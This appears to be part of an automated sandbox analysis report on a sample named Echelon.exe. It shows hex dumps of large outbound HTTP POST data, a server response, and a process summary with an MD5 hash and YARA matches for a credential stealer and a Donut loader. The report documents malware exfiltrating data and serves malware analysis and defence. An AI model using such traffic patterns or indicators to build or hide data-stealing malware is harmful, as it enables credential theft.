                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 05 fb cc ee 7e ed 96 c1 df 9d 19 1b e6 da 65 fb 3b 4d 6a f5 fb f3 c3 76 dc a1 1d ac 7f 5e ca 14 09 54 20 d1 7c 0f 07 38 b1 d5 bf b1 4c 5f 6a 33 57 73 94 cf 6e 8a 14 a1 1a 89 87 a8 c2 af 88 bd 7c b9 79 86 b5 a4 5a fd 8b f8 17 b3 d5 15 41 9a c6 2f e2 b1 69 0a 77 e0 0c 19 98 8f 33 9f fc 0d 38 24 4e 8f 18 55 fd c0 c6 8c f5 4e ec 97 c7 d4 57 36 f8 16 32 84 4e 57 1d 74 d8 64 ec 0b 6c 09 a0 1c 8b 7c 9f 2a 1e 55 5f 8d 96 8d 22 15 7c 71 b4 db 53 2b fd de ec 5e f0 93 41 54 d3 f3 f5 9a 95 b6 5c 61 cf f9 3c 43 d8 70 cf ef d9 c2 da d4 27 d4 ee 0f 84 a9 6f 85 22 ce 80 3c bd 4d 1b d1 b7 fd a0 1f ba b6 fa 43 54 61 a8 78 4f 7d e5 26 67 f3 50 21 d6 54 88 2c 2c e8 7b cf 74 3e 0c 26 9b 85 9d 97 1d f9 7e 18 23 27 45 fc 55 5c 88 3a 72 21 b7 80 90 5e b0 fa 2b a4 ff e3 7a 2a e7
                                                                                      Data Ascii: ~e;Mjv^T |8L_j3Wsn|yZA/iw38$NUNW62NWtdl|*U_"|qS+^AT\a<Cp'o"<MCTaxO}&gP!T,,{t>&~#'EU\:r!^+z*
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: e0 75 94 ca 7f 02 35 bd a7 0f 3a 94 07 97 5b 6f 3d 51 b0 98 d5 8d f2 8b 7b 1e a8 73 c4 fa c8 25 f7 ae 1f 25 67 ff a0 6a 9e 07 ec d8 38 13 3f 29 26 ed c1 a6 3c c7 85 9f cf 0f 7e 3b c0 2a b3 d1 ed e8 eb 7c 78 7d 30 a4 6e bc 38 b5 63 3f 39 d7 99 7b dd f2 ba 43 d7 d9 7c cd 82 b4 36 66 ef cf fc 73 1d 9d b1 b2 83 7b 2f 2c f5 2d ac bc 55 77 cc a1 fe d9 1f 76 5e cb 1c 44 3c 3e 07 f1 49 42 b5 15 be df bd 76 7c f0 64 9c 4f 77 de c3 97 9c d5 d0 95 3a 75 62 25 df 68 ff df f4 c1 44 da c0 c3 49 e7 db 35 39 7f 85 2d 74 45 75 35 48 5d 0a 5b 58 2f b9 81 42 85 b4 8e a5 e5 e4 36 8c a5 ae bc a5 ad da 58 b8 2e 18 fe 8c 4d cb 68 b8 d2 12 74 84 24 56 57 f3 95 fa 27 ca ed ed c2 44 56 fb 66 d6 8f ad ac ad c7 53 57 6c 8a 04 6c ce 18 de a1 29 4b d4 98 90 19 09 fa 56 6e 18 51 f6 9f
                                                                                      Data Ascii: u5:[o=Q{s%%gj8?)&<~;*|x}0n8c?9{C|6fs{/,-Uwv^D<>IBv|dOw:ub%hDI59-tEu5H][X/B6X.Mht$VW'DVfSWll)KVnQ
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 9a 0c c0 3f 91 87 db e7 3c 45 9b 03 cf 0c af c6 30 8e e1 5b 16 44 0d f8 d7 bf f7 20 77 83 99 05 e5 16 ba 20 26 25 a9 de 60 51 3b 1e d6 c4 78 4e 49 e7 b0 df 31 95 51 e6 58 e6 76 6c 67 b7 b6 1b 0c 47 84 3f d1 6d 37 e2 4b 70 3f ed f4 a6 f3 d5 c0 0e 84 6b 3f 42 db b3 5d 9b b3 db 44 1e 91 a6 bf 9e 15 95 db 88 c3 a3 04 57 f0 c0 cf 1c cf f6 39 e0 3c 54 3e cf 21 8f bc 2f 65 13 20 07 12 fb 6e 34 75 b9 34 60 17 cd e1 5e 42 e5 2f 89 f7 62 33 2f da 2d eb cf 10 64 2e 06 20 93 eb 16 c6 21 51 32 ef 2c 8b 3b 05 dd d8 78 36 92 4c a4 c8 6d 38 96 e4 cd 7b 08 f1 4f 24 d5 ed c7 e7 cf 7b b6 89 ca 2b 81 84 d5 d9 fe 66 dd b4 a6 9e 4b 40 4f c9 4c 27 fd 82 fe eb 7d fa 9a ad af 16 69 ca 95 e8 8f 47 5e 94 e0 80 4c 46 44 9d 14 3e 16 33 57 28 6c 8b 19 0f 3e bc 38 78 12 c0 ab a5 dc 28
                                                                                      Data Ascii: ?<E0[D w &%`Q;xNI1QXvlgG?m7Kp?k?B]DW9<T>!/e n4u4`^B/b3/-d. !Q2,;x6Lm8{O${+fK@OL'}iG^LFD>3W(l>8x(
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 26 05 4e 1a 24 04 5a c1 ca 30 eb 1e 6f 4c c6 6c fd b6 c5 77 7d 83 8d ab ed 36 e3 a9 e2 39 9c d6 87 8a ff f6 85 cf 6a 97 f1 c4 79 6a 73 31 72 29 d3 2c 4c 6c c6 80 4d 0e dd 33 67 26 b7 1f 4d 22 6d a4 2d 21 bf a1 45 7e 19 56 86 64 9f c9 84 e1 34 ac cc 28 34 ba d7 0c b1 56 93 da 42 e6 12 cb 8f ff 89 0e 23 60 85 e2 94 42 a1 84 0a 81 66 bd 21 93 8a 0f 32 da 56 f6 b8 6e 9b 2e c5 61 c5 6c 68 45 13 ec 30 e9 28 c0 c6 ec bb a8 59 ca 0b 08 22 67 46 05 dd 25 8f b0 5e 30 ac 38 d9 46 9b 12 5b ab 37 67 28 26 5b c0 dc c0 d8 bf 0e a7 02 1e 7d 11 65 88 22 54 d4 82 74 0b da 46 40 71 f7 7d 3b dc d2 7c 10 45 45 e8 03 b6 63 4f 09 f6 5a c6 6c 7c 0f 93 94 ad 2c 75 9d a6 b0 c8 7f f9 20 a5 b0 03 6d af 8d 05 f3 85 a5 7c 3c 94 cb d0 4b 06 db c6 d5 e6 46 1c bb be ee 4c 3b 88 1a 52 e4
                                                                                      Data Ascii: &N$Z0oLlw}69jyjs1r),LlM3g&M"m-!E~Vd4(4VB#`Bf!2Vn.alhE0(Y"gF%^08F[7g(&[}e"TtF@q};|EEcOZl|,u m|<KFL;R
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 41 63 2a 5b 8d 88 c0 eb ef c4 9d 2d 42 6e 7e f4 6f a6 ee e1 03 ca 7f 67 7d 73 78 b9 f9 43 34 72 6a 34 0e fb f1 00 db e3 11 ca c8 af f8 fc ee a8 3d 6a ba 70 b9 7d 49 ff 31 57 92 5a 60 4a 08 72 8e 24 e5 a0 1b be e5 20 43 d1 07 88 70 1b c9 c2 25 f1 b4 0f 20 a2 6f 8e 50 06 d3 c1 60 5b 15 10 37 38 40 a1 41 49 4a 2b 6b 3f f8 ab 4f 7d ad bd 85 de 54 a0 52 2f 01 b5 13 11 ab fe 23 d8 dd 75 2c d6 da 0f 5c 01 68 14 de 15 c0 91 ee 48 ed 71 d0 79 18 7b 22 b8 4b 5c ec 4d d5 b6 12 3b 36 e8 22 0a ff 22 46 07 08 22 11 36 6a 59 40 ed 08 af b3 6a f4 dd 18 d6 63 c9 4d 9b c8 b0 92 7d 22 d9 7c 35 1f 01 ef c8 51 fd 37 67 39 0f e3 e1 5b 7b 8d 74 b8 de 34 78 1d 90 7e 6d 64 98 8c 60 d7 e7 f4 cc f9 3e 74 7e f2 1e b3 4c 1c c0 f5 07 8f 70 fe ef 60 d1 2b e8 26 9c 13 5c 3b 66 33 82 a3
                                                                                      Data Ascii: Ac*[-Bn~og}sxC4rj4=jp}I1WZ`Jr$ Cp% oP`[78@AIJ+k?O}TR/#u,\hHqy{"K\M;6""F"6jY@jcM}"|5Q7g9[{t4x~md`>t~Lp`+&\;f3
                                                                                      2024-12-23 01:29:30 UTC1135INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7063gbv3p9nuet7c34flp8btvn; expires=Thu, 17 Apr 2025 19:16:08 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=msFVrLFhA2HdQfhN2zQECpF1wh0TkCnKnWgfKIL9pnsRbhI%2FGErGwD6F8LDHKsHVFHgqLyy6nu1xNC2qPIxovmyKcpn04J55Lv2M8ksTXPwXgHGmc0lGSf4DEvX%2FE%2Fa2HFgWdwM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494ad7ccb7c82-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=2003&rtt_var=762&sent=334&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=572571&delivery_rate=1427174&cwnd=212&unsent_bytes=0&cid=4ccb94319e2a2501&ts=2460&x=0"


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Target ID:0
                                                                                      Start time:20:29:00
                                                                                      Start date:22/12/2024
                                                                                      Path:C:\Users\user\Desktop\Echelon.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Echelon.exe"
                                                                                      Imagebase:0x810000
                                                                                      File size:6'689'112 bytes
                                                                                      MD5 hash:CBDEF49D32CF66BFA4C8A86D225B11BD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      No disassembly